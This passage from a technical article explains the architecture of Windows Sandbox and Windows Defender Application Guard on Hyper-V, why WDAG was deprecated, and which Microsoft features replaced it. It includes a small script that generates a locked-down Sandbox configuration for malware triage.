    HVC[Hyper-V Windows Container]
    HW --&amp;gt; HV
    HV --&amp;gt; Root
    Root --&amp;gt; HCS
    HCS --&amp;gt; WS
    HCS --&amp;gt; WDAG
    HCS --&amp;gt; HVC
&lt;p&gt;Notice the diagram&apos;s most important detail: the host NT kernel is &lt;em&gt;also&lt;/em&gt; a Hyper-V guest. It runs in the root partition, which has full physical-device access; the sandbox and WDAG partitions run as L1 guests with no physical-device access at all. The Hyper-V VM boundary -- the membrane between root and L1 -- is what Microsoft commits to defending. That commitment is published: the Microsoft Security Servicing Criteria for Windows [@microsoft-com-servicing-criteria] names the Hyper-V VM as a serviced security boundary, and the Hyper-V Bounty Program [@microsoft-com-hyper-v] pays up to $250,000 for a guest-to-host escape. The boundary has a dollar sign attached to it, which is how you know it counts.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The Hyper-V VM boundary is the serviced security boundary. Windows Sandbox and WDAG ride on top of that boundary; neither product &lt;em&gt;is&lt;/em&gt; the boundary. Bugs in the host-side broker, the clipboard channel, or the policy engine are not Hyper-V escapes -- they are integration bugs in features that happen to run inside a VM.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;This distinction matters operationally. When the Windows Sandbox configuration docs [@learn-microsoft-com-wsb-file] warn that enabling vGPU &quot;can potentially increase the attack surface of the sandbox,&quot; they are talking about widening a brokered channel from the L1 guest into the root partition&apos;s display stack. That channel runs &lt;em&gt;through&lt;/em&gt; the VM boundary; abusing it does not require breaking Hyper-V. The same logic applies to mapped folders, the clipboard, networking, and the Edge-window remoting path WDAG used. Each is a deliberate hole in the boundary, made for a reason, with its own threat model.&lt;/p&gt;
&lt;p&gt;With the substrate established, the next question is what Sandbox does on top of it. The answer turns on a single observation: the host already has a Windows image. Why download another one?&lt;/p&gt;
&lt;h2&gt;2. Windows Sandbox: The Disposable Desktop&lt;/h2&gt;
&lt;p&gt;Windows Sandbox shipped in Windows 10 1903 [@learn-microsoft-com-sandbox-install], the May 2019 update, as an optional Windows feature named &lt;code&gt;Containers-DisposableClientVM&lt;/code&gt; -- the install page documents both the version requirement and the exact PowerShell feature name. The naming is loud about the design goal. A &lt;em&gt;container&lt;/em&gt; (rather than a VM you manage with &lt;code&gt;vmconnect&lt;/code&gt;), &lt;em&gt;disposable&lt;/em&gt; (state is destroyed on close), for &lt;em&gt;client&lt;/em&gt; workloads (interactive desktop apps, not server workloads). Microsoft&apos;s original Windows Sandbox announcement on the Kernel Internals blog [@web-archive-org-p-301849] (preserved on the Internet Archive after Microsoft retired the canonical URL) frames the use cases plainly: trying out an installer, opening a suspicious download, testing an executable from email -- the same use cases the current Sandbox overview [@learn-microsoft-com-sandbox-overview] still enumerates.&lt;/p&gt;
&lt;p&gt;The trick that makes this feel cheap is the &lt;em&gt;dynamic base image&lt;/em&gt;.&lt;/p&gt;

The disk template Windows Sandbox uses to boot its guest. According to the Windows Sandbox architecture page [@learn-microsoft-com-sandbox-architecture], the on-disk package is approximately 30 MB compressed and expands to about 500 MB when installed. The expansion is mostly *pointers* back to the host&apos;s own immutable OS files; pristine private copies exist only for files the guest may legitimately mutate.
&lt;p&gt;A traditional VM ships a 4-8 GB VHDX with its own copy of Windows. The dynamic base image inverts that. Read-only files in the host -- &lt;code&gt;ntdll.dll&lt;/code&gt;, the bulk of &lt;code&gt;System32&lt;/code&gt;, the side-by-side cache -- are reflected into the guest by reference. The guest sees a complete Windows install at boot. The host barely paid for it.&lt;/p&gt;
&lt;p&gt;Memory uses an even sharper trick: &lt;em&gt;direct map&lt;/em&gt;.&lt;/p&gt;

A Hyper-V memory-sharing optimization, described on the Windows Sandbox architecture page [@learn-microsoft-com-sandbox-architecture], in which immutable physical pages are shared read-only between the host and the sandbox guest. When the guest loads `ntdll.dll`, the same physical RAM that already holds `ntdll.dll` on the host is mapped into the guest&apos;s address space rather than duplicated.
&lt;p&gt;The page is read-only from both sides, so a guest exploit cannot scribble into the host&apos;s copy. The win is memory pressure: dozens of megabytes for the guest&apos;s mutable state instead of hundreds of megabytes for a fresh Windows kernel image. The same architecture page describes the memory model directly: &quot;containers collaborate with the host to dynamically determine how host resources are allocated. This method is similar to how processes normally compete for memory on the host... If the host is under memory pressure, it can reclaim memory from the container much like it would with a process.&quot; A sandbox that does little uses little, and a sandbox that does a lot pulls pages from the host the same way a heavy host process would.Direct map is conceptually the same trick Linux uses to share &lt;code&gt;glibc&lt;/code&gt; between processes -- the same physical pages of a read-only binary backing many virtual address spaces. The Windows Sandbox application is to use that primitive across a Hyper-V partition boundary, not just across processes inside one kernel.&lt;/p&gt;
&lt;p&gt;Graphics use a third mechanism. A vGPU runs the guest&apos;s display through WDDM 2.5+, sharing the host GPU much like another process on the host would. When the host GPU lacks a compatible WDDM driver, the guest falls back to WARP, Microsoft&apos;s CPU-backed Direct3D rasterizer. The same Sandbox architecture page [@learn-microsoft-com-sandbox-architecture] cited above documents both branches: &quot;a system with a compatible GPU and graphics drivers (WDDM 2.5 or newer) is required. Incompatible systems render apps in Windows Sandbox with Microsoft&apos;s CPU-based rendering technology, Windows Advanced Rasterization Platform (WARP).&quot; That fallback is slow but means Sandbox starts on essentially any Pro+ Windows 10/11 install, not only on machines with modern discrete GPUs.&lt;/p&gt;

sequenceDiagram
    participant U as User
    participant Host as Host (root partition)
    participant HCS as HCS API
    participant G as Sandbox guest
    U-&amp;gt;&amp;gt;Host: Launch WindowsSandbox.exe (with optional .wsb)
    Host-&amp;gt;&amp;gt;HCS: HcsCreateComputeSystem(JSON)
    HCS-&amp;gt;&amp;gt;G: Allocate partition, mount dynamic base image
    HCS-&amp;gt;&amp;gt;G: Direct-map immutable host pages
    HCS-&amp;gt;&amp;gt;G: Start guest (boot stripped NT, run LogonCommand)
    G--&amp;gt;&amp;gt;Host: RDP-style remoting of desktop
    U-&amp;gt;&amp;gt;G: Drop .exe, run, observe
    U-&amp;gt;&amp;gt;Host: Close Sandbox window
    Host-&amp;gt;&amp;gt;HCS: HcsTerminateComputeSystem
    HCS-&amp;gt;&amp;gt;G: Destroy partition, discard all writable state
&lt;p&gt;What the user &lt;em&gt;configures&lt;/em&gt; is the small set of seams between guest and host. Configuration lives in a &lt;code&gt;.wsb&lt;/code&gt; file, an XML document the user double-clicks to launch a customized sandbox. The Windows Sandbox configuration page [@learn-microsoft-com-wsb-file] enumerates every supported element: &lt;code&gt;&amp;lt;vGPU&amp;gt;&lt;/code&gt;, &lt;code&gt;&amp;lt;Networking&amp;gt;&lt;/code&gt;, &lt;code&gt;&amp;lt;MappedFolders&amp;gt;&lt;/code&gt;, &lt;code&gt;&amp;lt;LogonCommand&amp;gt;&lt;/code&gt;, &lt;code&gt;&amp;lt;MemoryInMB&amp;gt;&lt;/code&gt;, &lt;code&gt;&amp;lt;AudioInput&amp;gt;&lt;/code&gt;, &lt;code&gt;&amp;lt;VideoInput&amp;gt;&lt;/code&gt;, &lt;code&gt;&amp;lt;ProtectedClient&amp;gt;&lt;/code&gt;, &lt;code&gt;&amp;lt;PrinterRedirection&amp;gt;&lt;/code&gt;, &lt;code&gt;&amp;lt;ClipboardRedirection&amp;gt;&lt;/code&gt;. Each line is a knob on the boundary.&lt;/p&gt;
&lt;p&gt;A minimal hostile-binary harness disables almost every shared channel:&lt;/p&gt;
&lt;p&gt;{&lt;code&gt;// Produce a Windows Sandbox configuration that minimizes shared channels. // Run this in Node, save the output as triage.wsb, then double-click it. const sample = &quot;C:\\\\Users\\\\analyst\\\\Samples\\\\suspicious.exe&quot;; const wsb = [   &quot;&amp;lt;Configuration&amp;gt;&quot;,   &quot;  &amp;lt;VGpu&amp;gt;Disable&amp;lt;/VGpu&amp;gt;&quot;,   &quot;  &amp;lt;Networking&amp;gt;Disable&amp;lt;/Networking&amp;gt;&quot;,   &quot;  &amp;lt;AudioInput&amp;gt;Disable&amp;lt;/AudioInput&amp;gt;&quot;,   &quot;  &amp;lt;VideoInput&amp;gt;Disable&amp;lt;/VideoInput&amp;gt;&quot;,   &quot;  &amp;lt;PrinterRedirection&amp;gt;Disable&amp;lt;/PrinterRedirection&amp;gt;&quot;,   &quot;  &amp;lt;ClipboardRedirection&amp;gt;Disable&amp;lt;/ClipboardRedirection&amp;gt;&quot;,   &quot;  &amp;lt;ProtectedClient&amp;gt;Enable&amp;lt;/ProtectedClient&amp;gt;&quot;,   &quot;  &amp;lt;MappedFolders&amp;gt;&quot;,   &quot;    &amp;lt;MappedFolder&amp;gt;&quot;,   &quot;      &amp;lt;HostFolder&amp;gt;C:\\\\Users\\\\analyst\\\\Samples&amp;lt;/HostFolder&amp;gt;&quot;,   &quot;      &amp;lt;SandboxFolder&amp;gt;C:\\\\Samples&amp;lt;/SandboxFolder&amp;gt;&quot;,   &quot;      &amp;lt;ReadOnly&amp;gt;true&amp;lt;/ReadOnly&amp;gt;&quot;,   &quot;    &amp;lt;/MappedFolder&amp;gt;&quot;,   &quot;  &amp;lt;/MappedFolders&amp;gt;&quot;,   &quot;&amp;lt;/Configuration&amp;gt;&quot; ].join(&quot;\\n&quot;); console.log(wsb); console.log(&quot;\\nSample path inside guest: &quot; + sample.replace(&quot;C:\\\\Users\\\\analyst&quot;, &quot;C:&quot;));&lt;/code&gt;}&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The default &lt;code&gt;.wsb&lt;/code&gt;-less Windows Sandbox launch enables networking and clipboard redirection. The configuration docs [@learn-microsoft-com-wsb-file] warn that enabled networking &quot;could expose untrusted applications to the internal network.&quot; For malware triage, the explicit &lt;code&gt;&amp;lt;Networking&amp;gt;Disable&amp;lt;/Networking&amp;gt;&lt;/code&gt; form above is the right starting point.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;A few cost-of-doing-business limits are worth flagging up front. Only one Sandbox can run at a time, per the Sandbox overview [@learn-microsoft-com-sandbox-overview], which also restricts the feature to Pro/Enterprise/Education SKUs (&quot;Windows Sandbox is currently not supported on Windows Home edition&quot;) and inherits the VBS-capable-hardware requirement from the OEM VBS guidance [@learn-microsoft-com-oem-vbs]. And while in-sandbox state survives a &lt;code&gt;shutdown /r&lt;/code&gt; inside the guest (a Windows 11 22H2 refinement called out in the same overview page), state still dies when the host UI window closes -- &quot;disposable&quot; is the contract, not a marketing word.&lt;/p&gt;
&lt;p&gt;A &lt;code&gt;Containers-DisposableClientVM&lt;/code&gt; partition, then, is essentially a Hyper-V container with a desktop bolted on, a shared OS image, a few configurable channels, and a strict &quot;destroy on close&quot; lifecycle. WDAG, the older sibling, took the same building blocks and arranged them around a completely different question: not &quot;run this executable once&quot; but &quot;render this website transparently.&quot;&lt;/p&gt;
&lt;h2&gt;3. WDAG: The Persistent Browser Container&lt;/h2&gt;
&lt;p&gt;Windows Defender Application Guard shipped in Windows 10 1709 -- the Fall Creators Update [@learn-microsoft-com-build-16299] (Microsoft&apos;s UWP what&apos;s-new page identifies &quot;Windows 10 build 16299 (also known as the Fall Creators Update or version 1709)&quot;), with a GA start date of October 17, 2017 [@learn-microsoft-com-and-education] per the Microsoft Lifecycle page. The WDAG install guide [@learn-microsoft-com-app-guard] still lists standalone-mode support starting at &quot;Windows 10 Enterprise edition, version 1709 and later.&quot; At launch it integrated with the legacy EdgeHTML-based Edge; later it integrated with Chromium-based Edge for Business and, beginning in 2020, with Microsoft 365 Apps for Enterprise to wrap untrusted Office documents -- the MDAG overview [@learn-microsoft-com-guard-overview] explicitly enumerates the file types: &quot;Application Guard helps prevent untrusted Word, PowerPoint, and Excel files from accessing trusted resources.&quot; The product was rebranded from &quot;Windows Defender Application Guard&quot; to &quot;Microsoft Defender Application Guard&quot; along the way -- the &lt;code&gt;isolatedapplauncher.h&lt;/code&gt; header notes [@learn-microsoft-com-api-isolatedapplauncher] state directly that &quot;Windows Defender Application Guard (WDAG) is now Microsoft Defender Application Guard (MDAG). The WDAG name is deprecated, but it is still used in some APIs.&quot; This article uses WDAG for continuity.&lt;/p&gt;
&lt;p&gt;The use case was specific and corporate: in a managed enterprise, an employee may need to follow a customer&apos;s link, open an inbound attachment, or read a marketing site -- content that originates &lt;em&gt;outside&lt;/em&gt; the organization&apos;s network perimeter. WDAG&apos;s job was to render that content in a partition that &lt;em&gt;cannot&lt;/em&gt; talk to the intranet, so that a renderer exploit chained to a kernel LPE inside the guest could not pivot to corporate file shares, Active Directory, or the user&apos;s own home directory.&lt;/p&gt;
&lt;p&gt;The trust boundary was policy-defined.&lt;/p&gt;

The Group Policy mechanism Windows uses to enumerate &quot;what counts as inside the enterprise network,&quot; documented under Configure Microsoft Defender Application Guard [@learn-microsoft-com-app-guard-2]. Administrators populate Enterprise Network Domains, Cloud Resources, Internal Proxies, and IPv4/IPv6 Subnets. Anything inside the list is rendered in the host browser; anything outside is reissued inside the WDAG container.
&lt;p&gt;This is the property Windows Sandbox does not have. Sandbox is a manual tool; WDAG was transparent. Click an external link in Outlook, and a separate Edge window opens hosting the rendered page -- the user did not have to know about, configure, or invoke a sandbox. The host-side broker forwarded the navigation; the in-container Edge rendered the page; an RDP-family remoting path relayed pixels back to the host UI. Microsoft has not publicly named the inner protocol, but its visible behavior -- per-window remoting of a single app onto the host desktop -- is the signature of the Remote Applications Integrated Locally (RAIL) virtual channel specified in &lt;a href=&quot;https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rdperp/&quot; rel=&quot;noopener&quot;&gt;[MS-RDPERP]&lt;/a&gt;, the RDP extension that &quot;presents a remote application... as a local user application.&quot; The implementation may differ in detail; the architectural shape is the same.&lt;/p&gt;
&lt;p&gt;Where Sandbox is &quot;destroy on close,&quot; WDAG was &quot;warm at logon.&quot;&lt;/p&gt;

sequenceDiagram
    participant U as User
    participant Logon as Winlogon
    participant Broker as Host WDAG broker
    participant Cont as WDAG container
    participant Edge as Container Edge
    Logon-&amp;gt;&amp;gt;Broker: User signs in
    Broker-&amp;gt;&amp;gt;Cont: HCS pre-warm container (pruned image)
    Cont-&amp;gt;&amp;gt;Edge: Boot, idle, await navigation
    U-&amp;gt;&amp;gt;Broker: Click https://external.example
    Broker-&amp;gt;&amp;gt;Broker: Network Isolation policy check (out of zone)
    Broker-&amp;gt;&amp;gt;Edge: Reissue URL inside container
    Edge--&amp;gt;&amp;gt;Broker: Render via RDP-family remoting (RAIL-shaped)
    Broker--&amp;gt;&amp;gt;U: Display container window on host desktop
&lt;p&gt;The configuration surface was correspondingly broader than Sandbox&apos;s &lt;code&gt;.wsb&lt;/code&gt;. Group Policy settings controlled clipboard direction (upload, download, both, neither), file print to host, microphone and camera access, hardware acceleration, and -- most operationally consequential -- whether downloads escape the container at all. The Microsoft Edge WDAG configuration guidance [@learn-microsoft-com-application-guard] listed knobs like &lt;code&gt;ApplicationGuardUploadBlockingEnabled&lt;/code&gt; and &lt;code&gt;ApplicationGuardPassiveModeEnabled&lt;/code&gt; for security-versus-usability tuning.&lt;/p&gt;
&lt;p&gt;WDAG also exposed a small detection API for applications running inside it, the &lt;code&gt;IsolatedAppLauncher&lt;/code&gt; COM interface [@learn-microsoft-com-api-isolatedapplauncher]. The methods &lt;code&gt;IsProcessInWDAGContainer&lt;/code&gt; and &lt;code&gt;IsProcessInIsolatedContainer&lt;/code&gt; let an app know &quot;am I in the guest?&quot; -- useful for, say, disabling drivers that cannot work inside the partition. The header carries the deprecation notice today.The detection-from-inside API is itself a useful tell about WDAG&apos;s threat model. If the guest needed to &lt;em&gt;know&lt;/em&gt; it was the guest, that means software running inside it could legitimately do guest-specific things -- license activation, optional installers, telemetry. WDAG was meant to host fully functional applications, not a stripped renderer. That breadth is part of what made its operational cost real.&lt;/p&gt;
&lt;p&gt;What it improved over the AppContainer-wrapped Edge of 2016 was substantial. A renderer-to-kernel exploit in the container&apos;s stripped Windows guest landed in a throwaway kernel that had no view of the host filesystem, no route to the corporate intranet, no host clipboard write path, and no persistence across reboot. The kernel attack surface of the partition is, &lt;em&gt;in the limit&lt;/em&gt;, the Hyper-V VM boundary. That is a serviced Microsoft boundary; an AppContainer-wrapped Edge is not.&lt;/p&gt;
&lt;p&gt;So why was WDAG retired and Sandbox kept? Because in the WDAG threat model, the &quot;warm partition for every employee, all day long, on every device&quot; became a tax that the in-browser sandbox could finally outrun.&lt;/p&gt;
&lt;h2&gt;4. The Lifecycle Divergence&lt;/h2&gt;
&lt;p&gt;The clearest way to see why two siblings on the same substrate diverged is to put their lifecycles side by side. Sandbox boots on user gesture, runs as long as one window stays open, dies on close. WDAG booted at user logon, stayed resident the entire session, and discarded state only when the user signed out (or, for the persistent variant, never). The same Hyper-V partition primitive, allocated at very different points in the day, for very different durations, was being asked to solve very different problems.&lt;/p&gt;

The point at which a security primitive&apos;s instance lifetime is anchored. Sandbox is *gesture-bound*: an instance exists because a user explicitly launched it. WDAG was *session-bound*: an instance existed because a user signed in. AppContainer is *process-bound*: an instance exists because a sandboxed binary is running. Each binding implies a different cost model and a different set of failure modes.
&lt;p&gt;Gesture binding is cheap in expectation. Most users open Sandbox seldom -- when a particular file looks suspicious, when an installer wants admin rights for unclear reasons, when an analyst is reproducing a sample. The cost of the partition is paid on demand and only by the user who needed it. The &lt;code&gt;Containers-DisposableClientVM&lt;/code&gt; feature in the Sandbox install docs [@learn-microsoft-com-sandbox-install] ships an &lt;em&gt;option&lt;/em&gt;: enabled but unused, it costs nothing beyond the dynamic base image on disk.&lt;/p&gt;
&lt;p&gt;Session binding has the opposite cost profile. Every employee, on every device, pays for a Hyper-V child partition at every logon, whether or not they ever browse an untrusted URL. The partition holds memory. The host-side broker holds memory. The pre-warmed Edge holds memory. The Network Isolation policy must be evaluated on every navigation. The clipboard, downloads, and print paths require ongoing brokering. Even on a workstation that idles all day in front of an intranet portal, WDAG was a tax line item.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; A serviced security boundary is cheap when it is allocated by gesture and expensive when it is allocated by session. WDAG bet that the per-session cost would amortize against frequent untrusted browsing; that bet failed for most enterprise users because the marginal extra protection over an in-browser sandbox (Edge ESM + ACG + CET) was small for the &lt;em&gt;typical&lt;/em&gt; navigation, even though it remained large for the &lt;em&gt;worst-case&lt;/em&gt; navigation.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The threat models also point in opposite directions. Sandbox optimizes for a single, contained interaction with an untrusted artifact: drop the &lt;code&gt;.exe&lt;/code&gt;, run it, watch what happens, close the window. Anything the artifact does inside the partition -- registry writes, scheduled-task creation, persistence attempts -- is annihilated when the window closes. WDAG was optimizing for the opposite: many small, transparent interactions with untrusted content (clicks, navigations, document opens), all of which had to feel seamless or the user would route around them.&lt;/p&gt;

gantt
    title Sandbox vs WDAG lifecycle on a typical 8-hour workday
    dateFormat HH:mm
    axisFormat %H:%M
    section Windows Sandbox
    Idle (no cost) :done, ws1, 09:00, 11:00
    Analyst opens suspicious.exe :crit, ws2, 11:00, 11:15
    Idle (no cost) :done, ws3, 11:15, 16:00
    Test installer :crit, ws4, 16:00, 16:10
    Idle (no cost) :done, ws5, 16:10, 17:00
    section WDAG (legacy)
    Pre-warmed partition resident :crit, wd1, 09:00, 17:00
&lt;p&gt;The lifecycle asymmetry also asymmetrically rewards engineering effort. Hardening an in-browser renderer pays off thousands of times per session -- every page load benefits. Hardening a per-employee Hyper-V partition pays off only on the navigations that actually leave the trusted zone, which for most users is a small fraction of clicks. As the in-browser side became dramatically stronger between 2018 and 2023 -- Site Isolation, V8 sandboxing, Arbitrary Code Guard (ACG), Control-flow Enforcement Technology (CET), the new Edge Enhanced Security Mode -- the marginal value of WDAG dropped while its operational cost did not.&lt;/p&gt;
&lt;p&gt;That set up the deprecation decision.&lt;/p&gt;
&lt;h2&gt;5. The Deprecation Decision&lt;/h2&gt;
&lt;p&gt;The retirement happened in two visible steps and a long invisible runway.&lt;/p&gt;
&lt;p&gt;The first visible step was the Edge-side deprecation, announced in 2023. The Microsoft Edge and Microsoft Defender Application Guard [@learn-microsoft-com-application-guard] page now opens with the banner: &quot;Microsoft Defender Application Guard, including the Windows Isolated App Launcher APIs, is deprecated for Microsoft Edge for Business and will no longer be updated.&quot; The same page makes the operational substitute explicit: &quot;The additional security features in Edge make it very secure without needing Application Guard,&quot; then enumerates Defender SmartScreen, Enhanced Security Mode, website typo protection, and Data Loss Prevention as the &lt;em&gt;replacement set&lt;/em&gt; for the WDAG-for-Edge scenario.&lt;/p&gt;
&lt;p&gt;The second visible step was the OS-level removal in Windows 11 version 24H2. The MDAG overview banner [@learn-microsoft-com-guard-overview] is unambiguous: &quot;Starting with Windows 11, version 24H2, Microsoft Defender Application Guard, including the Windows Isolated App Launcher APIs, is no longer available.&quot; The &lt;code&gt;isolatedapplauncher.h&lt;/code&gt; API reference [@learn-microsoft-com-api-isolatedapplauncher] carries the matching deprecation notice for the COM surface. Code paths that called &lt;code&gt;IIsolatedAppLauncher&lt;/code&gt; on a 24H2 box now hit a removed feature; the API names remain in the documentation as historical record.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The Edge-side deprecation and the OS-side removal in Windows 11 24H2 are often conflated in coverage. They are different. The Edge-side deprecation stopped updates and the New-Tab-Page entry point; existing fleets on earlier Windows versions retained the underlying feature. The 24H2 removal pulled the kernel-mode plumbing -- the Sandbox install page [@learn-microsoft-com-sandbox-install] even calls out a side-effect: &quot;Beginning in Windows 11, version 24H2, inbox store apps like Calculator, Photos, Notepad and Terminal are not available inside Windows Sandbox,&quot; because the underlying app-isolation broker was reworked as part of the same cleanup.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The invisible runway behind those two banners is the more interesting story. Microsoft&apos;s Security Servicing Criteria for Windows [@microsoft-com-servicing-criteria] page names &quot;Hyper-V VM&quot; as a serviced security boundary but does not name WDAG or Application Guard. WDAG was always a &lt;em&gt;feature&lt;/em&gt; that &lt;em&gt;used&lt;/em&gt; the Hyper-V VM boundary; it was never the boundary itself. A bug in the WDAG broker, the Network Isolation policy evaluator, the clipboard channel, or the host-side window remoting was an integration bug, not a Hyper-V escape, and so was never going to attract the kind of bounty payout -- &quot;up to $250,000 USD&quot; per the Hyper-V Bounty Program [@microsoft-com-hyper-v] -- that the underlying boundary attracts. The economic shape of WDAG&apos;s bug surface always favored deprecation: it was a complex, brokered feature whose worst plausible CVE was a privilege-escalation inside Edge, not a guest-to-host RCE.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; WDAG&apos;s deprecation was overdetermined. (1) The session-bound cost model could not be amortized for most users. (2) The in-browser mitigations (ACG, CET, Edge ESM, Site Isolation) closed the marginal-security gap on the &lt;em&gt;typical&lt;/em&gt; navigation. (3) The integration-bug class -- broker, clipboard, policy -- was never going to be on Microsoft&apos;s serviced security boundary list. Each reason alone could have justified retirement; all three together made it inevitable.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;What was &lt;em&gt;kept&lt;/em&gt; is just as telling. The Hyper-V VM boundary stayed; the bounty program stayed; the HCS API stayed; Windows Sandbox stayed; Hyper-V isolation containers on Windows Server stayed. Microsoft did not retire any of the things that made WDAG technically possible -- only the specific arrangement of those things into a session-bound, transparent, browser-targeted feature. The mechanism was kept; the productization was retired.&lt;/p&gt;
&lt;h2&gt;6. The WDAG Replacement Stack&lt;/h2&gt;
&lt;p&gt;There is no single replacement for WDAG. There is a stack of complementary features, each of which absorbs a slice of WDAG&apos;s old job. The Edge-deprecation page enumerates the substitute set; what follows pulls each item back to its primary source.&lt;/p&gt;
&lt;h3&gt;6.1 Edge Enhanced Security Mode (in-browser sandbox)&lt;/h3&gt;
&lt;p&gt;WDAG-for-Edge is now Microsoft Edge Enhanced Security Mode (ESM). The browse-safer page [@learn-microsoft-com-browse-safer] is explicit about what changed: &quot;Enhanced security mode in Microsoft Edge mitigates memory-related vulnerabilities by disabling just-in-time (JIT) JavaScript compilation and enabling additional operating system protections for the browser. These protections include Hardware-enforced Stack Protection and Arbitrary Code Guard (ACG).&quot;&lt;/p&gt;
&lt;p&gt;Functionally, ESM gives up the Hyper-V partition boundary and replaces it with a set of process-mitigation policies that make the in-browser sandbox materially harder to escape. The renderer still runs on the host kernel, but with JIT disabled (closing a large class of write-then-execute primitives), CET enforcing shadow stacks, and ACG blocking dynamic code generation. For &lt;em&gt;unfamiliar&lt;/em&gt; sites only, the browser flips into this mode automatically; familiar sites keep JIT on for performance.The trade is explicit on the page: &quot;Developers should be aware that the WebAssembly (WASM) interpreter running in enhanced security mode might not yield the expected level of performance.&quot; ESM is consciously slower in exchange for a smaller attack surface, and it concedes that this trade is only worth making on a subset of navigations. WDAG made the same concession at the partition level; ESM makes it at the mitigation level.&lt;/p&gt;
&lt;h3&gt;6.2 Smart App Control (OS-level binary trust)&lt;/h3&gt;
&lt;p&gt;For downloads -- the other half of &quot;untrusted content reaches the user&quot; -- the replacement is Smart App Control [@learn-microsoft-com-control-overview]. The Microsoft Learn page describes it as &quot;an app execution control feature that combines Microsoft&apos;s app intelligence services and Windows&apos; code integrity features to protect users from untrusted or potentially dangerous code.&quot; The Windows 11 Security Book [@learn-microsoft-com-driver-control] clarifies the mechanism: Smart App Control &quot;blocks untrusted or unsigned applications&quot; by predicting safety from a cloud intelligence service, and &quot;blocks unknown script files and macros from the web.&quot;&lt;/p&gt;
&lt;p&gt;The replacement logic is direct. WDAG protected the host kernel from a malicious download by running the download inside a Hyper-V partition. Smart App Control protects the host kernel from a malicious download by &lt;em&gt;not running it at all&lt;/em&gt; unless app intelligence predicts it is safe or it is signed by a trusted CA. The first approach contains the blast radius after execution; the second prevents execution altogether. For the common case -- a user clicking through a suspicious-looking installer -- prevention strictly dominates containment.&lt;/p&gt;
&lt;h3&gt;6.3 Defender for Endpoint network protection (policy-defined trust boundary)&lt;/h3&gt;
&lt;p&gt;For the policy-defined &quot;enterprise vs not-enterprise&quot; boundary that the Network Isolation policy used to draw for WDAG, the replacement is Defender for Endpoint&apos;s network protection [@learn-microsoft-com-network-protection] feature. The page describes it as &quot;expand[ing] the scope of Microsoft Defender SmartScreen to block all outbound HTTP(S) traffic that attempts to connect to poor-reputation sources (based on the domain or hostname),&quot; operating at the OS level. The same page is precise about which processes it covers on Windows: it enforces against non-Microsoft browsers and non-browser processes (for example, PowerShell), and its own Note states that &quot;on Windows, network protection doesn&apos;t monitor Microsoft Edge. For processes other than Microsoft Edge and Internet Explorer, web protection scenarios use network protection for inspection and enforcement.&quot; For Microsoft Edge on Windows, the same reputational source feed (SmartScreen) operates inside the browser; Network Protection is the cross-process extension of that feed to the other process classes.&lt;/p&gt;
&lt;p&gt;The shift is from &lt;em&gt;isolate, then permit anything inside the isolated zone&lt;/em&gt; (WDAG) to &lt;em&gt;enforce a reputational/IOC-based block list at the host network stack&lt;/em&gt; (Defender). The replacement gives up the partition boundary in exchange for matching coverage across every process on the device, not just Edge.&lt;/p&gt;
&lt;h3&gt;6.4 Office Protected View and Office SmartScreen (per-document admission)&lt;/h3&gt;
&lt;p&gt;The Office slice of WDAG -- the variant that wrapped untrusted Word, PowerPoint, and Excel files in a Hyper-V partition -- was always a layered feature on top of an older, cheaper primitive: Office Protected View [@support-microsoft-com-8e43-2bbcdbcb6653]. The Microsoft Support page describes the primitive directly: &quot;files from these potentially unsafe locations are opened as read only or in Protected View. By using Protected View, you can read a file, see its contents and enable editing while reducing the risks.&quot; The page also calls out the WDAG layering explicitly: &quot;If your machine has Application Guard for Microsoft 365 enabled, documents that previously opened in Protected View will now open in Application Guard for Microsoft 365&quot; -- which is exactly the slice that 24H2 removed. Without WDAG, Protected View is the residual primitive: documents from the internet, untrusted senders, or unsafe locations open read-only in a stripped-down Office process until the user opts in to editing.&lt;/p&gt;
&lt;p&gt;Around Protected View sits a second admission layer: SmartScreen-derived reputation checks on the artifact itself. The Microsoft 365 Apps internet-macros guidance [@learn-microsoft-com-macros-blocked] sets the policy directly: &quot;VBA macros are a common way for malicious actors to gain access to deploy malware and ransomware. Therefore, to help improve security in Office, we&apos;re changing the default behavior of Office applications to block macros in files from the internet.&quot; The page describes how Office uses the Mark of the Web -- the same signal SmartScreen uses for binaries -- to decide whether macros in a given document are admitted. Where the WDAG-for-Office configuration would have re-rendered the document inside a Hyper-V partition regardless of macro content, the 2026 replacement turns the question off: macros in internet-origin documents simply do not run.&lt;/p&gt;
&lt;p&gt;Together, the two features are the document analog of Smart App Control + Defender network protection: a read-only fallback for the artifact itself (Protected View) and a reputation-driven admission policy for its riskiest payload (macros). Neither replaces a partition; the union covers WDAG&apos;s Office slice at the cost of giving up the kernel boundary around the document.&lt;/p&gt;

flowchart LR
    WDAG[WDAG legacy feature]
    WDAG --&amp;gt;|Untrusted browsing| ESM[Edge Enhanced Security Mode&lt;br /&gt;JIT off, ACG, CET on unfamiliar sites]
    WDAG --&amp;gt;|Untrusted downloads| SAC[Smart App Control&lt;br /&gt;Cloud-AI binary trust]
    WDAG --&amp;gt;|Network trust zoning| DNP[Defender network protection&lt;br /&gt;Host-stack URL/domain enforcement]
    WDAG --&amp;gt;|Office documents| OFP[Office Protected View / SmartScreen]
&lt;p&gt;The stack is not a one-for-one swap. Each feature trades the Hyper-V VM boundary for something cheaper to operate. The aggregate covers the WDAG threat model at &lt;em&gt;typical&lt;/em&gt; navigation cost; for the unusual case where an enterprise still wants a hard kernel boundary around an untrusted workload, Microsoft&apos;s recommended fallback [@learn-microsoft-com-application-guard] is explicit: &quot;If your organization requires container-based isolation, we recommend Windows Sandbox or Azure Virtual Desktop (AVD).&quot; The Hyper-V partition is still there. It just is no longer running every employee&apos;s browser, all day, by default.&lt;/p&gt;
